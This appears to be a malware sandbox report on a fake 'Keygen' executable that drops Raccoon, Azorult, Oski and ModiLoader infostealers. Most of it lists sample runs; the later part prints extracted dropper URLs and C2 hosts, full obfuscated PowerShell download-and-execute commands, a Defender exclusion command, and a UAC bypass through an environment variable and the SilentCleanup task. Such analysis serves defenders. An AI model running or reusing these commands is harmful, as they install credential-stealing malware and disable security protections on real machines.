Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    159s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:38:18 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (521 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Extracted

Family

raccoon

Botnet

cf43f57ef5d1c064538f5f9d27891dc66c96dad8

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

oski

C2

nadia.ac.ug

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 48 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (35) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (35) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\A766.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (35) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1680
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
          • C:\Users\Public\gzi.exe
            "C:\Users\Public\gzi.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2544
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2724
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2964
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2964 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\062206284569737\\* & exit
                  8⤵
                    PID:2972
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2964
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2736
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:2756
              • C:\Users\Public\gzi.exe
                "C:\Users\Public\gzi.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2888
                • C:\Users\Admin\AppData\Local\Temp\ifhWQPqmnI.exe
                  "C:\Users\Admin\AppData\Local\Temp\ifhWQPqmnI.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2128
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\ifhWQPqmnI.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2940
                • C:\Users\Admin\AppData\Local\Temp\RL28Vnu2xE.exe
                  "C:\Users\Admin\AppData\Local\Temp\RL28Vnu2xE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:1748
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2688
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:688
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:2212
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:1504
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:2272
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:2364
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:1928
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:2432
                          • C:\Users\Admin\AppData\Local\Temp\t1pF9k6U5K.exe
                            "C:\Users\Admin\AppData\Local\Temp\t1pF9k6U5K.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:1656
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\otk0we1r.inf
                              8⤵
                                PID:3032
                            • C:\Users\Admin\AppData\Local\Temp\oEAiAt68rr.exe
                              "C:\Users\Admin\AppData\Local\Temp\oEAiAt68rr.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1948
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:916
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\gzi.exe"
                              7⤵
                                PID:1512
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:1460
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\m1.hta"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1124
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1504
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 1
                        3⤵
                        • Delays execution with timeout.exe
                        PID:1836
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\b.hta"
                        3⤵
